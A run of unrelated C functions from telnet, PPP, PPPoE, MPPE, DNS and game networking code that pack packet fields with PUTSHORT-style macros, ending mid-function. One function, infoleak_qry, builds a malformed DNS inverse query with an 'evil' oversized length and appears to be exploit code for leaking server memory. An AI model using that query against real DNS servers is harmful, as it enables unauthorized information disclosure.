void sendnaws() { long rows, cols; unsigned char tmp[16]; unsigned char *cp; if (my_state_is_wont(TELOPT_NAWS)) return; #undef PUTSHORT #define PUTSHORT(cp, x) { if ((*cp++ = ((x)>>8)&0xff) == IAC) *cp++ = IAC; \ if ((*cp++ = ((x))&0xff) == IAC) *cp++ = IAC; } if (TerminalWindowSize(&rows, &cols) == 0) { /* Failed */ return; } cp = tmp; *cp++ = IAC; *cp++ = SB; *cp++ = TELOPT_NAWS; PUTSHORT(cp, cols); PUTSHORT(cp, rows); *cp++ = IAC; *cp++ = SE; if (NETROOM() >= cp - tmp) { ring_supply_data(&netoring, tmp, cp-tmp); printsub('>', tmp+2, cp - tmp - 2); } }
void SendJoystick (int player, int x, int y, int buttons) { PUTHEAD (SJOYSTICK); PUTSHORT (buffer + HEADSIZE, x); PUTSHORT (buffer + HEADSIZE + 2, y); PUTCHAR (buffer + HEADSIZE + 4, buttons); PUTCHAR (buffer + HEADSIZE + 5, player); csendreliable (buffer, HEADSIZE + 6); }
void SendMouse (int player, int x, int y, int buttons) { PUTHEAD (SMOUSE); PUTSHORT (buffer + HEADSIZE, x); PUTSHORT (buffer + HEADSIZE + 2, y); PUTCHAR (buffer + HEADSIZE + 4, buttons); PUTCHAR (buffer + HEADSIZE + 5, player); csendreliable (buffer, HEADSIZE + 6); }
int mesg_make_query (u_char *qname, uint16_t qtype, uint16_t qclass, uint32_t id, int rd, u_char *buf, int buflen) { char *fn = "mesg_make_query()"; u_char *ucp; int i, written_len; Mesg_Hdr *hdr; if (T.debug > 4) syslog (LOG_DEBUG, "%s: (qtype: %s, id: %d): start", fn, string_rtype (qtype), id); hdr = (Mesg_Hdr *) buf; /* write header */ hdr->id = id; hdr->opcode = OP_QUERY; hdr->rcode = RC_OK; hdr->rd = rd; hdr->qr = hdr->aa = hdr->tc = hdr->ra = hdr->zero = 0; hdr->qdcnt = ntohs (1); hdr->ancnt = hdr->nscnt = hdr->arcnt = ntohs (0); written_len = sizeof (Mesg_Hdr); ucp = (u_char *) (hdr + 1); /* write qname */ if (T.debug > 4) syslog (LOG_DEBUG, "%s: qname offset = %d", fn, (int)(ucp - buf)); i = dname_copy (qname, ucp, buflen - written_len); if (i < 0) return -1; written_len += i; ucp += i; /* write qtype / qclass */ if (T.debug > 4) syslog (LOG_DEBUG, "%s: qtype/qclass offset = %d", fn, (int)(ucp - buf)); written_len += sizeof (uint16_t) * 2; if (written_len > buflen) return -1; PUTSHORT (qtype, ucp); PUTSHORT (qclass, ucp); return written_len; }
/* * ChapSendStatus - Send a status response (ack or nak). */ static void ChapSendStatus( chap_state *cstate, int code) { u_char *outp; int outlen, msglen; char msg[256]; if (code == CHAP_SUCCESS) slprintf(msg, sizeof(msg), "Welcome to %s.", hostname); else slprintf(msg, sizeof(msg), "I don't like you. Go 'way."); msglen = strlen(msg); outlen = CHAP_HEADERLEN + msglen; outp = outpacket_buf; MAKEHEADER(outp, PPP_CHAP); /* paste in a header */ PUTCHAR(code, outp); PUTCHAR(cstate->chal_id, outp); PUTSHORT(outlen, outp); BCOPY(msg, outp, msglen); output(cstate->unit, outpacket_buf, outlen + PPP_HDRLEN); }
//****************************************************************************** // Generate PAP options ( username + password) //****************************************************************************** void UPAPGenWapAuth(PAP_CnfgOptions_t *po, char * user, char * password) { char *us_user; /* User */ int us_userlen; /* User length */ char *us_passwd; /* Password */ int us_passwdlen; /* Password length */ int outlen; u_char *outp; /* Save the username and password we're given */ us_user = user; us_userlen = strlen(user); us_passwd = password; us_passwdlen = strlen(password); outlen = UPAP_HEADERLEN + 2 * sizeof (u_char) + us_userlen + us_passwdlen; outp = po->content; PUTCHAR(UPAP_AUTHREQ, outp); PUTCHAR(gChid, outp); PUTSHORT(outlen, outp); PUTCHAR(us_userlen, outp); memcpy(outp, us_user, us_userlen); INCPTR(us_userlen, outp); PUTCHAR(us_passwdlen, outp); memcpy(outp, us_passwd, us_passwdlen); po->len = outlen; po->flag = 1; }
/* * fsm_sdata - Send some data. * * Used for all packets sent to our peer by this module. */ void fsm_sdata(fsm *f, u_char code, u_char id, const u_char *data, int datalen) { ppp_pcb *pcb = f->pcb; struct pbuf *p; u_char *outp; int outlen; /* Adjust length to be smaller than MTU */ if (datalen > pcb->peer_mru - HEADERLEN) datalen = pcb->peer_mru - HEADERLEN; outlen = datalen + HEADERLEN; p = pbuf_alloc(PBUF_RAW, (u16_t)(outlen + PPP_HDRLEN), PPP_CTRL_PBUF_TYPE); if(NULL == p) return; if(p->tot_len != p->len) { pbuf_free(p); return; } outp = (u_char*)p->payload; if (datalen) /* && data != outp + PPP_HDRLEN + HEADERLEN) -- was only for fsm_sconfreq() */ MEMCPY(outp + PPP_HDRLEN + HEADERLEN, data, datalen); MAKEHEADER(outp, f->protocol); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); ppp_write(pcb, p); }
/* * upap_sresp - Send a response (ack or nak). */ static void upap_sresp(ppp_pcb *pcb, u_char code, u_char id, const char *msg, int msglen) { struct pbuf *p; u_char *outp; int outlen; outlen = UPAP_HEADERLEN + sizeof (u_char) + msglen; p = pbuf_alloc(PBUF_RAW, (u16_t)(PPP_HDRLEN +outlen), PPP_CTRL_PBUF_TYPE); if(NULL == p) return; if(p->tot_len != p->len) { pbuf_free(p); return; } outp = (u_char*)p->payload; MAKEHEADER(outp, PPP_PAP); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); PUTCHAR(msglen, outp); MEMCPY(outp, msg, msglen); ppp_write(pcb, p); }
/* * upap_sauthreq - Send an Authenticate-Request. */ static void upap_sauthreq(upap_state *u) { u_char *outp; int outlen; outlen = UPAP_HEADERLEN + 2 * sizeof (u_char) + u->us_userlen + u->us_passwdlen; outp = outpacket_buf[u->us_unit]; MAKEHEADER(outp, PPP_PAP); PUTCHAR(UPAP_AUTHREQ, outp); PUTCHAR(++u->us_id, outp); PUTSHORT(outlen, outp); PUTCHAR(u->us_userlen, outp); BCOPY(u->us_user, outp, u->us_userlen); INCPTR(u->us_userlen, outp); PUTCHAR(u->us_passwdlen, outp); BCOPY(u->us_passwd, outp, u->us_passwdlen); pppWrite(u->us_unit, outpacket_buf[u->us_unit], outlen + PPP_HDRLEN); UPAPDEBUG((LOG_INFO, "pap_sauth: Sent id %d\n", u->us_id)); TIMEOUT(upap_timeout, u, u->us_timeouttime); ++u->us_transmits; u->us_clientstate = UPAPCS_AUTHREQ; }
/* * ChapSendChallenge - Send an Authenticate challenge. */ static void ChapSendChallenge( chap_state *cstate) { u_char *outp; int chal_len, name_len; int outlen; chal_len = cstate->chal_len; name_len = strlen(cstate->chal_name); outlen = CHAP_HEADERLEN + sizeof (u_char) + chal_len + name_len; outp = outpacket_buf; MAKEHEADER(outp, PPP_CHAP); /* paste in a CHAP header */ PUTCHAR(CHAP_CHALLENGE, outp); PUTCHAR(cstate->chal_id, outp); PUTSHORT(outlen, outp); PUTCHAR(chal_len, outp); /* put length of challenge */ BCOPY(cstate->challenge, outp, chal_len); INCPTR(chal_len, outp); BCOPY(cstate->chal_name, outp, name_len); /* append hostname */ output(cstate->unit, outpacket_buf, outlen + PPP_HDRLEN); TIMEOUT(ChapChallengeTimeout, cstate, cstate->timeouttime); ++cstate->chal_transmits; }
/* * upap_sauthreq - Send an Authenticate-Request. */ static void upap_sauthreq(ppp_pcb *pcb) { struct pbuf *p; u_char *outp; int outlen; outlen = UPAP_HEADERLEN + 2 * sizeof (u_char) + pcb->upap.us_userlen + pcb->upap.us_passwdlen; p = pbuf_alloc(PBUF_RAW, (u16_t)(PPP_HDRLEN +outlen), PPP_CTRL_PBUF_TYPE); if(NULL == p) return; if(p->tot_len != p->len) { pbuf_free(p); return; } outp = (u_char*)p->payload; MAKEHEADER(outp, PPP_PAP); PUTCHAR(UPAP_AUTHREQ, outp); PUTCHAR(++pcb->upap.us_id, outp); PUTSHORT(outlen, outp); PUTCHAR(pcb->upap.us_userlen, outp); MEMCPY(outp, pcb->upap.us_user, pcb->upap.us_userlen); INCPTR(pcb->upap.us_userlen, outp); PUTCHAR(pcb->upap.us_passwdlen, outp); MEMCPY(outp, pcb->upap.us_passwd, pcb->upap.us_passwdlen); ppp_write(pcb, p); TIMEOUT(upap_timeout, pcb, pcb->settings.pap_timeout_time); ++pcb->upap.us_transmits; pcb->upap.us_clientstate = UPAPCS_AUTHREQ; }
/* ARGSUSED */ static void ChapSendResponse( chap_state *cstate) { u_char *outp; int outlen, md_len, name_len; md_len = cstate->resp_length; name_len = strlen(cstate->resp_name); outlen = CHAP_HEADERLEN + sizeof (u_char) + md_len + name_len; outp = outpacket_buf; MAKEHEADER(outp, PPP_CHAP); PUTCHAR(CHAP_RESPONSE, outp); /* we are a response */ PUTCHAR(cstate->resp_id, outp); /* copy id from challenge packet */ PUTSHORT(outlen, outp); /* packet length */ PUTCHAR(md_len, outp); /* length of MD */ BCOPY(cstate->response, outp, md_len); /* copy MD to buffer */ INCPTR(md_len, outp); BCOPY(cstate->resp_name, outp, name_len); /* append our name */ /* send the packet */ output(cstate->unit, outpacket_buf, outlen + PPP_HDRLEN); cstate->clientstate = CHAPCS_RESPONSE; TIMEOUT(ChapResponseTimeout, cstate, cstate->timeouttime); ++cstate->resp_transmits; }
/** * making ConfReq. */ static void lcp_addci(fsm *f, u_char *ucp, int *lenp) { lcp *_this; u_char *start_ucp = ucp; LCP_ASSERT(f != NULL); _this = &f->ppp->lcp; if (!psm_opt_is_rejected(_this, mru)) { PUTCHAR(PPP_LCP_MRU, ucp); PUTCHAR(4, ucp); if (_this->xxxmru > 0) { /* this value is got by Nak. */ PUTSHORT(_this->xxxmru, ucp); } else { PUTSHORT(f->ppp->mru, ucp); } psm_opt_set_requested(_this, mru, 1); } if (f->ppp->has_acf == 1) { if (!psm_opt_is_rejected(_this, pfc)) { PUTCHAR(PPP_LCP_PFC, ucp); PUTCHAR(2, ucp); psm_opt_set_requested(_this, pfc, 1); } if (!psm_opt_is_rejected(_this, acfc)) { PUTCHAR(PPP_LCP_ACFC, ucp); PUTCHAR(2, ucp); psm_opt_set_requested(_this, acfc, 1); } } PUTCHAR(PPP_LCP_MAGICNUMBER, ucp); PUTCHAR(6, ucp); PUTLONG(_this->magic_number, ucp); if (f->ppp->peer_auth != 0) { _this->auth_order[0] = f->ppp->peer_auth; _this->auth_order[1] = -1; } else if (_this->auth_order[0] < 0) { lcp_load_authconfig(f); } lcp_add_auth(f, &ucp); *lenp = ucp - start_ucp; }
/* * fsm_sconfreq - Send a Configure-Request. */ static void fsm_sconfreq(fsm *f, int retransmit) { ppp_pcb *pcb = f->pcb; struct pbuf *p; u_char *outp; int cilen; if( f->state != PPP_FSM_REQSENT && f->state != PPP_FSM_ACKRCVD && f->state != PPP_FSM_ACKSENT ){ /* Not currently negotiating - reset options */ if( f->callbacks->resetci ) (*f->callbacks->resetci)(f); f->nakloops = 0; f->rnakloops = 0; } if( !retransmit ){ /* New request - reset retransmission counter, use new ID */ f->retransmits = pcb->settings.fsm_max_conf_req_transmits; f->reqid = ++f->id; } f->seen_ack = 0; /* * Make up the request packet */ if( f->callbacks->cilen && f->callbacks->addci ){ cilen = (*f->callbacks->cilen)(f); if( cilen > pcb->peer_mru - HEADERLEN ) cilen = pcb->peer_mru - HEADERLEN; } else cilen = 0; p = pbuf_alloc(PBUF_RAW, (u16_t)(cilen + HEADERLEN + PPP_HDRLEN), PPP_CTRL_PBUF_TYPE); if(NULL == p) return; if(p->tot_len != p->len) { pbuf_free(p); return; } /* send the request to our peer */ outp = (u_char*)p->payload; MAKEHEADER(outp, f->protocol); PUTCHAR(CONFREQ, outp); PUTCHAR(f->reqid, outp); PUTSHORT(cilen + HEADERLEN, outp); if (cilen != 0) { (*f->callbacks->addci)(f, outp, &cilen); LWIP_ASSERT("cilen == p->len - HEADERLEN - PPP_HDRLEN", cilen == p->len - HEADERLEN - PPP_HDRLEN); } ppp_write(pcb, p); /* start the retransmit timer */ --f->retransmits; TIMEOUT(fsm_timeout, f, pcb->settings.fsm_timeout_time); }
void csend (unsigned char *message, int size) { if (obufferpos + size + 2 + 4 > BUFFERSIZE) csendbuffer (); PUTSHORT ((obuffer + obufferpos + 4), size + 2); memcpy (obuffer + obufferpos + 6, message, size); obufferpos += size + 2; }
int infoleak_qry(char* buff) { HEADER* hdr; int n, k; char* ptr; int qry_space = 12; int dummy_names = 7; int evil_size = 0xff; memset(buff, 0, BUFFSIZE); hdr = (HEADER*)buff; hdr->id = htons(0xbeef); hdr->opcode = IQUERY; hdr->rd = 1; hdr->ra = 1; hdr->qdcount = htons(0); hdr->nscount = htons(0); hdr->ancount = htons(1); hdr->arcount = htons(0); ptr = buff + sizeof(HEADER); printf("[d] HEADER is %d long\n", sizeof(HEADER)); n = 62; for(k=0; k < dummy_names; k++) { *ptr++ = n; ptr += n; } ptr += 1; PUTSHORT(1/*ns_t_a*/, ptr); /* type */ PUTSHORT(T_A, ptr); /* class */ PUTLONG(1, ptr); /* ttl */ PUTSHORT(evil_size, ptr); /* our *evil* size */ return(ptr - buff + qry_space); }
void csendbegining (unsigned char *message, int size) /*send at more reliable beggining of packet */ { if (obufferpos + size + 6 > BUFFERSIZE) csendbuffer (); memmove (obuffer + size + 6, obuffer + 4, obufferpos); PUTSHORT ((obuffer + 4), size + 2); memcpy (obuffer + 6, message, size); obufferpos += size + 2; }
int send_packet(int fd, char *buff, int len) { char tmp[2], *ptr=tmp; PUTSHORT(len,ptr); if(write(fd,tmp,2)!=2) return(-1); if(write(fd,buff,len)!=len) return(-1); return(1); }
/** * sending packet via MPPE. */ void mppe_pkt_output(mppe *_this, uint16_t proto, u_char *pktp, int len) { int encrypt, flushed; uint16_t coher_cnt; u_char *outp, *outp0; MPPE_ASSERT(proto == PPP_PROTO_IP); flushed = 0; encrypt = 1; outp = ppp_packetbuf(_this->ppp, PPP_PROTO_MPPE); outp0 = outp; if (_this->send.stateless != 0) { flushed = 1; mppe_key_change(_this, &_this->send); } else { if ((_this->send.coher_cnt % 0x100) == 0xff) { flushed = 1; mppe_key_change(_this, &_this->send); } else if (_this->send.resetreq != 0) { flushed = 1; _this->send.resetreq = 0; } } if (flushed) { mppe_rc4_setkey(_this, &_this->send); } MPPE_DBG((_this, DEBUG_LEVEL_2, "out coher_cnt=%03x %s%s", _this->send.coher_cnt, (flushed)? "[flushed]" : "", (encrypt)? "[encrypt]" : "")); coher_cnt = _this->send.coher_cnt & COHERENCY_CNT_MASK; if (flushed) coher_cnt |= 0x8000; if (encrypt) coher_cnt |= 0x1000; PUTSHORT(coher_cnt, outp); proto = htons(proto); mppe_rc4_encrypt(_this, &_this->send, 2, (u_char *)&proto, outp); mppe_rc4_encrypt(_this, &_this->send, len, pktp, outp + 2); ppp_output(_this->ppp, PPP_PROTO_MPPE, 0, 0, outp0, len + 4); _this->send.coher_cnt++; _this->send.coher_cnt &= COHERENCY_CNT_MASK; }
void csendreliable (unsigned char *message, int size) { if (size == 0) return; if (rposition + size + 6 > BUFFERSIZE) { printf ("Connection to server broken too long! Reliable buffer owerfllow\n" "Game aborted\n"); exit (-1); } PUTLONG ((rbuffer + rposition), rcount); rcount++; PUTSHORT ((rbuffer + rposition + 4), (size + 6)); memcpy (rbuffer + rposition + 6, message, size); rposition += size + 6; timeout = 1; }
/* * upap_sresp - Send a response (ack or nak). */ static void upap_sresp(upap_state *u, u_char code, u_char id, char *msg, int msglen) { u_char *outp; int outlen; outlen = UPAP_HEADERLEN + sizeof (u_char) + msglen; outp = outpacket_buf[u->us_unit]; MAKEHEADER(outp, PPP_PAP); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); PUTCHAR(msglen, outp); BCOPY(msg, outp, msglen); pppWrite(u->us_unit, outpacket_buf[u->us_unit], outlen + PPP_HDRLEN); UPAPDEBUG((LOG_INFO, "pap_sresp: Sent code %d, id %d s=%d\n", code, id, u->us_clientstate)); }
int session_disconnect_ppp(){ struct pppoe_packet padt; char buf[MAX_PAYLOAD + sizeof(struct pppoe_hdr)]; int data_len = sizeof(struct pppoe_hdr); struct pppoe_hdr *ph = NULL; char * ptr; int i, error = 0; unsigned char ppp_disconn[64]; unsigned char * outp; memset(&padt,0,sizeof(struct pppoe_packet)); memcpy(&padt.addr, &old_ses.remote, sizeof(struct sockaddr_ll)); padt.addr.sll_protocol= ntohs(ETH_P_PPP_SES); padt.hdr = (struct pppoe_hdr*) old_ses.curr_pkt.buf; padt.hdr->ver = 1; padt.hdr->type = 1; padt.hdr->code = 0x00; padt.hdr->sid = old_ses.sp.sa_addr.pppoe.sid; padt.hdr->length = 6; ph = (struct pppoe_hdr *) buf; memcpy(ph, padt.hdr, sizeof(struct pppoe_hdr)); outp = ppp_disconn; MAKEHEADER(outp, PPP_LCP); // 2 bytes PUTCHAR(5, outp); // TERMREQ==5 // 1 byte PUTCHAR(2, outp); // id=02 // 1 byte PUTSHORT(4, outp); // HEADERLEN==4 in fsm.h // 2 byte ptr = buf; memcpy(ptr+6, ppp_disconn+2, 6); error = sendto(disc_sock, buf, data_len+6, 0, (struct sockaddr*) &padt.addr, sizeof(struct sockaddr_ll)); if (error < 0) return 0; return 1; }
static void cbcp_send(cbcp_state *us, u_char code, u_char *buf, int len) { u_char *outp; int outlen; outp = outpacket_buf; outlen = 4 + len; MAKEHEADER(outp, PPP_CBCP); PUTCHAR(code, outp); PUTCHAR(us->us_id, outp); PUTSHORT(outlen, outp); if (len) BCOPY(buf, outp, len); output(us->us_unit, outpacket_buf, outlen + PPP_HDRLEN); }
/* * fsm_sdata - Send some data. * * Used for all packets sent to our peer by this module. */ void fsm_sdata(fsm *f, int code, int id, u_char *data, int datalen) { u_char *outp; int outlen; /* Adjust length to be smaller than MTU */ outp = outpacket_buf; if (datalen > peer_mru[f->unit] - HEADERLEN) datalen = peer_mru[f->unit] - HEADERLEN; if (datalen && data != outp + PPP_HDRLEN + HEADERLEN) BCOPY(data, outp + PPP_HDRLEN + HEADERLEN, datalen); outlen = datalen + HEADERLEN; MAKEHEADER(outp, f->protocol); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); output(f->unit, outpacket_buf, outlen + PPP_HDRLEN); FSMDEBUG((LOG_INFO, "fsm_sdata(%s): Sent code %d, id %d.", PROTO_NAME(f), code, id)); }
/* * fsm_sdata - Send some data. * * Used for all packets sent to our peer by this module. */ void fsm_sdata( fsm *f, u_char code, u_char id, u_char *data, int datalen) { u_char *outp; int outlen; /* Adjust length to be smaller than MTU */ outp = outpacket_buf[f->unit]; if (datalen > peer_mru[f->unit] - (int)HEADERLEN) { datalen = peer_mru[f->unit] - HEADERLEN; } if (datalen && data != outp + PPP_HDRLEN + HEADERLEN) { BCOPY(data, outp + PPP_HDRLEN + HEADERLEN, datalen); } outlen = datalen + HEADERLEN; MAKEHEADER(outp, f->protocol); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); pppWrite(f->unit, outpacket_buf[f->unit], outlen + PPP_HDRLEN); FSMDEBUG(LOG_INFO, ("fsm_sdata(%s): Sent code %d,%d,%d.\n", PROTO_NAME(f), code, id, outlen)); }
/* * fsm_sdata - Send some data. * * Used for all packets sent to our peer by this module. */ void fsm_sdata( fsm *f, u_char code, u_char id, u_char *data, int datalen) { u_char *outp; int outlen; /* Adjust length to be smaller than MTU */ outp = outpacket_buf; if (datalen > peer_mru[f->unit] - HEADERLEN) datalen = peer_mru[f->unit] - HEADERLEN; if (datalen && data != outp + PPP_HDRLEN + HEADERLEN) BCOPY(data, outp + PPP_HDRLEN + HEADERLEN, datalen); outlen = datalen + HEADERLEN; MAKEHEADER(outp, f->protocol); PUTCHAR(code, outp); PUTCHAR(id, outp); PUTSHORT(outlen, outp); output(f->unit, outpacket_buf, outlen + PPP_HDRLEN); }
int ns_sign2(u_char *msg, int *msglen, int msgsize, int error, void *k, const u_char *querysig, int querysiglen, u_char *sig, int *siglen, time_t in_timesigned, u_char **dnptrs, u_char **lastdnptr) { HEADER *hp = (HEADER *)msg; DST_KEY *key = (DST_KEY *)k; u_char *cp, *eob; u_char *lenp; u_char *alg; int n; time_t timesigned; u_char name[NS_MAXCDNAME]; dst_init(); if (msg == NULL || msglen == NULL || sig == NULL || siglen == NULL) return (-1); cp = msg + *msglen; eob = msg + msgsize; /* Name. */ if (key != NULL && error != ns_r_badsig && error != ns_r_badkey) { n = ns_name_pton(key->dk_key_name, name, sizeof name); if (n != -1) n = ns_name_pack(name, cp, eob - cp, (const u_char **)dnptrs, (const u_char **)lastdnptr); } else { n = ns_name_pton("", name, sizeof name); if (n != -1) n = ns_name_pack(name, cp, eob - cp, NULL, NULL); } if (n < 0) return (NS_TSIG_ERROR_NO_SPACE); cp += n; /* Type, class, ttl, length (not filled in yet). */ BOUNDS_CHECK(cp, INT16SZ + INT16SZ + INT32SZ + INT16SZ); PUTSHORT(ns_t_tsig, cp); PUTSHORT(ns_c_any, cp); PUTLONG(0, cp); /*%< TTL */ lenp = cp; cp += 2; /* Alg. */ if (key != NULL && error != ns_r_badsig && error != ns_r_badkey) { if (key->dk_alg != KEY_HMAC_MD5) return (-ns_r_badkey); n = dn_comp(NS_TSIG_ALG_HMAC_MD5, cp, eob - cp, NULL, NULL); } else n = dn_comp("", cp, eob - cp, NULL, NULL); if (n < 0) return (NS_TSIG_ERROR_NO_SPACE); alg = cp; cp += n; /* Time. */ BOUNDS_CHECK(cp, INT16SZ + INT32SZ + INT16SZ); PUTSHORT(0, cp); timesigned = time(NULL); if (error != ns_r_badtime) PUTLONG(timesigned, cp); else PUTLONG(in_timesigned, cp); PUTSHORT(NS_TSIG_FUDGE, cp); /* Compute the signature. */ if (key != NULL && error != ns_r_badsig && error != ns_r_badkey) { void *ctx; u_char buf[NS_MAXCDNAME], *cp2; int n; dst_sign_data(SIG_MODE_INIT, key, &ctx, NULL, 0, NULL, 0); /* Digest the query signature, if this is a response. */ if (querysiglen > 0 && querysig != NULL) { u_int16_t len_n = htons(querysiglen); dst_sign_data(SIG_MODE_UPDATE, key, &ctx, (u_char *)&len_n, INT16SZ, NULL, 0); dst_sign_data(SIG_MODE_UPDATE, key, &ctx, querysig, querysiglen, NULL, 0); } /* Digest the message. */ dst_sign_data(SIG_MODE_UPDATE, key, &ctx, msg, *msglen, NULL, 0); /* Digest the key name. */ n = ns_name_ntol(name, buf, sizeof(buf)); INSIST(n > 0); dst_sign_data(SIG_MODE_UPDATE, key, &ctx, buf, n, NULL, 0); /* Digest the class and TTL. */ cp2 = buf; PUTSHORT(ns_c_any, cp2); PUTLONG(0, cp2); dst_sign_data(SIG_MODE_UPDATE, key, &ctx, buf, cp2-buf, NULL, 0); /* Digest the algorithm. */ n = ns_name_ntol(alg, buf, sizeof(buf)); INSIST(n > 0); dst_sign_data(SIG_MODE_UPDATE, key, &ctx, buf, n, NULL, 0); /* Digest the time signed, fudge, error, and other data */ cp2 = buf; PUTSHORT(0, cp2); /*%< Top 16 bits of time */ if (error != ns_r_badtime) PUTLONG(timesigned, cp2); else PUTLONG(in_timesigned, cp2); PUTSHORT(NS_TSIG_FUDGE, cp2); PUTSHORT(error, cp2); /*%< Error */ if (error != ns_r_badtime) PUTSHORT(0, cp2); /*%< Other data length */ else { PUTSHORT(INT16SZ+INT32SZ, cp2); /*%< Other data length */ PUTSHORT(0, cp2); /*%< Top 16 bits of time */ PUTLONG(timesigned, cp2); } dst_sign_data(SIG_MODE_UPDATE, key, &ctx, buf, cp2-buf, NULL, 0); n = dst_sign_data(SIG_MODE_FINAL, key, &ctx, NULL, 0, sig, *siglen); if (n < 0) return (-ns_r_badkey); *siglen = n; } else *siglen = 0; /* Add the signature. */ BOUNDS_CHECK(cp, INT16SZ + (*siglen)); PUTSHORT(*siglen, cp); memcpy(cp, sig, *siglen); cp += (*siglen); /* The original message ID & error. */ BOUNDS_CHECK(cp, INT16SZ + INT16SZ); PUTSHORT(ntohs(hp->id), cp); /*%< already in network order */ PUTSHORT(error, cp); /* Other data. */ BOUNDS_CHECK(cp, INT16SZ); if (error != ns_r_badtime) PUTSHORT(0, cp); /*%< Other data length */ else { PUTSHORT(INT16SZ+INT32SZ, cp); /*%< Other data length */ BOUNDS_CHECK(cp, INT32SZ+INT16SZ); PUTSHORT(0, cp); /*%< Top 16 bits of time */ PUTLONG(timesigned, cp); } /* Go back and fill in the length. */ PUTSHORT(cp - lenp - INT16SZ, lenp); hp->arcount = htons(ntohs(hp->arcount) + 1); *msglen = (cp - msg); return (0); }
int ns_sign_tcp2(u_char *msg, int *msglen, int msgsize, int error, ns_tcp_tsig_state *state, int done, u_char **dnptrs, u_char **lastdnptr) { u_char *cp, *eob, *lenp; u_char buf[MAXDNAME], *cp2; HEADER *hp = (HEADER *)msg; time_t timesigned; int n; if (msg == NULL || msglen == NULL || state == NULL) return (-1); state->counter++; if (state->counter == 0) return (ns_sign2(msg, msglen, msgsize, error, state->key, state->sig, state->siglen, state->sig, &state->siglen, 0, dnptrs, lastdnptr)); if (state->siglen > 0) { u_int16_t siglen_n = htons(state->siglen); dst_sign_data(SIG_MODE_INIT, state->key, &state->ctx, NULL, 0, NULL, 0); dst_sign_data(SIG_MODE_UPDATE, state->key, &state->ctx, (u_char *)&siglen_n, INT16SZ, NULL, 0); dst_sign_data(SIG_MODE_UPDATE, state->key, &state->ctx, state->sig, state->siglen, NULL, 0); state->siglen = 0; } dst_sign_data(SIG_MODE_UPDATE, state->key, &state->ctx, msg, *msglen, NULL, 0); if (done == 0 && (state->counter % 100 != 0)) return (0); cp = msg + *msglen; eob = msg + msgsize; /* Name. */ n = dn_comp(state->key->dk_key_name, cp, eob - cp, dnptrs, lastdnptr); if (n < 0) return (NS_TSIG_ERROR_NO_SPACE); cp += n; /* Type, class, ttl, length (not filled in yet). */ BOUNDS_CHECK(cp, INT16SZ + INT16SZ + INT32SZ + INT16SZ); PUTSHORT(ns_t_tsig, cp); PUTSHORT(ns_c_any, cp); PUTLONG(0, cp); /*%< TTL */ lenp = cp; cp += 2; /* Alg. */ n = dn_comp(NS_TSIG_ALG_HMAC_MD5, cp, eob - cp, NULL, NULL); if (n < 0) return (NS_TSIG_ERROR_NO_SPACE); cp += n; /* Time. */ BOUNDS_CHECK(cp, INT16SZ + INT32SZ + INT16SZ); PUTSHORT(0, cp); timesigned = time(NULL); PUTLONG(timesigned, cp); PUTSHORT(NS_TSIG_FUDGE, cp); /* * Compute the signature. */ /* Digest the time signed and fudge. */ cp2 = buf; PUTSHORT(0, cp2); /*%< Top 16 bits of time */ PUTLONG(timesigned, cp2); PUTSHORT(NS_TSIG_FUDGE, cp2); dst_sign_data(SIG_MODE_UPDATE, state->key, &state->ctx, buf, cp2 - buf, NULL, 0); n = dst_sign_data(SIG_MODE_FINAL, state->key, &state->ctx, NULL, 0, state->sig, sizeof(state->sig)); if (n < 0) return (-ns_r_badkey); state->siglen = n; /* Add the signature. */ BOUNDS_CHECK(cp, INT16SZ + state->siglen); PUTSHORT(state->siglen, cp); memcpy(cp, state->sig, state->siglen); cp += state->siglen; /* The original message ID & error. */ BOUNDS_CHECK(cp, INT16SZ + INT16SZ); PUTSHORT(ntohs(hp->id), cp); /*%< already in network order */ PUTSHORT(error, cp); /* Other data. */ BOUNDS_CHECK(cp, INT16SZ); PUTSHORT(0, cp); /* Go back and fill in the length. */ PUTSHORT(cp - lenp - INT16SZ, lenp); hp->arcount = htons(ntohs(hp->arcount) + 1); *msglen = (cp - msg); return (0); }
static int lcp_reqci(fsm *f, u_char *inp, int *lenp, int reject_if_disagree) { uint32_t magic; int type, len, rcode, mru, lrej; u_char *inp0, *rejbuf, *nakbuf, *nakbuf0; lcp *_this; _this = &f->ppp->lcp; rejbuf = NULL; rcode = -1; inp0 = inp; lrej = 0; if ((rejbuf = malloc(*lenp)) == NULL) return -1; if ((nakbuf0 = malloc(*lenp)) == NULL) { free(rejbuf); return -1; } nakbuf = nakbuf0; #define remlen() (*lenp - (inp - inp0)) #define LCP_OPT_PEER_ACCEPTED(opt) \ psm_peer_opt_set_accepted(&f->ppp->lcp, opt, 1); f->ppp->lcp.recv_reqs++; while (remlen() >= 2) { GETCHAR(type, inp); GETCHAR(len, inp); if (len <= 0 || remlen() + 2 < len) goto fail; switch (type) { case PPP_LCP_MRU: if (len != 4) goto fail; GETSHORT(mru, inp); f->ppp->peer_mru = mru; if (mru < NPPPD_MIN_MRU) { if (reject_if_disagree) { inp -= 2; goto reject; } if (lrej > 0) { /* if there is a reject, will send Rej, not send Nak. */ } else { inp -= 2; memcpy(nakbuf, inp, len); nakbuf += len; inp += 2; PUTSHORT(f->ppp->mru, nakbuf); rcode = CONFNAK; } } else LCP_OPT_PEER_ACCEPTED(mru); break; case PPP_LCP_MAGICNUMBER: if (len != 6) goto fail; GETLONG(magic, inp); if (magic == _this->magic_number) { inp -= 4; goto reject; } _this->peer_magic_number = magic; break; case PPP_LCP_PFC: if (len != 2) goto fail; LCP_OPT_PEER_ACCEPTED(pfc); break; case PPP_LCP_ACFC: if (len != 2) goto fail; LCP_OPT_PEER_ACCEPTED(acfc); break; case PPP_LCP_AUTH_PROTOCOL: /* currently never authenticate. */ case PPP_LCP_QUALITY_PROTOCOL: /* not used */ default: reject: inp -= 2; memcpy(rejbuf + lrej, inp, len); lrej += len; inp += len; rcode = CONFREJ; } continue; } if (rcode == -1) rcode = CONFACK; fail: switch (rcode) { case CONFREJ: memcpy(inp0, rejbuf, lrej); *lenp = lrej; break; case CONFNAK: memcpy(inp0, nakbuf0, nakbuf - nakbuf0); *lenp = nakbuf - nakbuf0; break; } if (rcode != CONFACK) { psm_peer_opt_set_accepted(&f->ppp->lcp, mru, 0); psm_peer_opt_set_accepted(&f->ppp->lcp, pfc, 